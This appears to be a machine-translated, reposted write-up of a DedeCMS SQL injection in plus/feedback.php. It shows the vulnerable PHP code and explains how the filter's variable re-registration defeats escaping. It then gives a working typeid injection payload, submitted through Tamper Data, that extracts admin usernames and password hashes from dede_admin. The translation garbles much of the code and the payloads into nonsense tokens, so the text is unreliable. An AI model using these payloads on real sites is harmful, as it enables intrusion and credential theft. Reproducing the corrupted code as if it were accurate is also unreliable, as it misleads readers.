Shulou(Shulou.com)06/01 Report--

How to carry out the analysis of dedecms injection, aiming at this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Vulnerability file: plus\ feedback.php.

The code with the problem:

... if ($comtype = = 'comments')

{

$arctitle = addslashes ($title)

If ($msgloves thanks thanks')

The {/ / $typeid variable is not initialized

$inquery = "INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`)

VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml- > M_ID}','0').

Echo $inquery;// debugging, outputting query statements

$rs = $dsql- > ExecuteNoneQuery ($inquery)

If (! $rs)

{

ShowMsg ('wrong comment!','- 1')

/ / echo $dsql- > GetError ()

Exit ()

}

}

}

/ / quote reply

Elseif ($comtype = = 'reply')

{

$row = $dsql- > GetOne ("SELECT * FROM `dede_ feedback` WHERE id ='$fid'")

$arctitle = $row ['arctitle']

$aid = $row ['aid']

$msg = $quotemsg.$msg

$msg = HtmlReplace ($msg, 2)

$inquery = "INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`)

VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime',' {$cfg_ml- > M_ID}', '0mm, 0mm, 0mm, etc.) "

$dsql- > ExecuteNoneQuery ($inquery)

}

The complete input statement, the second parameter typeid can be controlled.

INSERT INTO `feedback` (`aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) VALUES ('108mmsg`) VALUES (' 108cm', '108',' paxmac','127.0.0.1','1','1351774092',',

The common.inc.php file will process all the request.

Function _ RunMagicQuotes & $svar)

{

If (! get_magic_quotes_gpc ()

{

If (is_array ($svar))

{

Foreach ($svar as $_ k = > $_ v) $svar [$_ k] = _ RunMagicQuotes ($_ v)

}

Else

{

If (strlen ($svar) > 0 & & preg_match ('# ^ (cfg_ | GLOBALS | _ GET | _ POST | _ COOKIE) #', $svar))

{

Exit ('Request var not allowable')

}

$svar = addslashes ($svar)

}

}

Return $svar

}

... ..

Foreach (Array ('_ GET','_POST','_COOKIE') as $_ request)

{

Foreach ($$_ request as $_ k = > $_ v)

{

If ($_ k = = 'nvarname') ${$_ k} = $_ v

Else ${$_ k} = _ RunMagicQuotes ($_ v)

}

}

... .

You can see from the above code that he escaped the foreign submission, but in the filter.ini.php file

Function _ FilterAll ($fk, & $svar)

{

Global $cfg_notallowstr,$cfg_replacestr

If (is_array ($svar))

{

Foreach ($svar as $_ k = > $_ v)

{

$svar [$_ k] = _ FilterAll ($fk,$_v)

}

}

Else

{

If ($cfgspeak notallowstricken buildings'& & preg_match ("#". $cfg_notallowstr. "# I", $svar))

{

ShowMsg ("$fk has not allow words!",'- 1')

Exit ()

}

If ($cfgkeeper replacestringpieces created recently')

{

$svar = preg_replace ('/'. $cfg_replacestr.'/i', "* *", $svar)

}

}

Return $svar

}

/ * filter _ GET,_POST,_COOKIE * /

Foreach (Array ('_ GET','_POST','_COOKIE') as $_ request)

{

Foreach ($$_ request as $_ k = > $_ v)

{

${$_ k} = _ FilterAll ($_ k)

}

} above is the code that handles sensitive words, but registers the variables, resulting in a second overwrite vulnerability of the variables. In fact, this loophole existed a long time ago, because the submitted variables only check the key of an one-dimensional array, which can be bypassed to create system configuration variables that are not allowed. Dedecms has always been baffling, patching is superficial, and the actual cause of the vulnerability problem is not modified. Judging from this patch, he only added a sentence to determine whether $typeid is a number or not, and continued to ignore the anti-injection code for 80sec that was bypassed twice.

So in GPC=OFF, the escaped variables will be overwritten again and become normal code.

Eg: typeid=2\ 'overwritten typeid=2'

Students who have studied the problem of dedecms SQL injection last time must know his anti-injection mechanism. Here is a simple analysis. He regards the content between\ and\ as trustworthy and does not check it. So we can avoid checking as long as we put the code we want to use in''. Using a syntax of Mysql, its value @ ```is empty. Here's how to construct a vulnerability exp:

Typeid=123',@ ```, 0x11111111111pr 1351739660, 0pje 0re0pl 0pl 0pl 0pl 0je (SELECT concat (uname,0x5f,pwd,0x5f) FROM dede_admin)), (108 dje 1111)

I submit this parameter using tamper data

In fact, a little bug is also used here.

You can see his table structure, only msg can be null, but using the code to use null in the username, this is an illegal statement, alone insert will not be successful, but the latter sentence is established, insert (aMaginb) values (1Mague 1) (2Mague 2) (1Magne1,) illegal (2Magne2) meet the conditions will successfully insert two statements at the same time. Due to the problem of displaying the number of characters, the msg field is selected as the output.

Add: `aid`, `typeid`, `username`, `arctitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg` aid is the ID of the article, so it is not successful to use my sentence directly. You need to modify it to your own article ID.

Typeid=123',@ ```, 0 × 11111, 1111 ID,'1111 1351739660, 0meme 0meme 0memo 0, (SELECT concat (uname,0x5f,pwd,0x5f) FROM `dede_ admin`)), (comment article ID,'1111

If submitted by Tamper, (article id=123) msg is changed to www.hack6.com

Mcbang&typeid=0','3','4','5','0','1351739660',%20'0','0','0','0','0','aaaaaa'), ((SELECT concat (uname,0x5f,pwd,0x5f) from'@ # _ admin'), (1351739660), (1351739660).

This is the answer to the analysis question on how to carry out dedecms injection. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.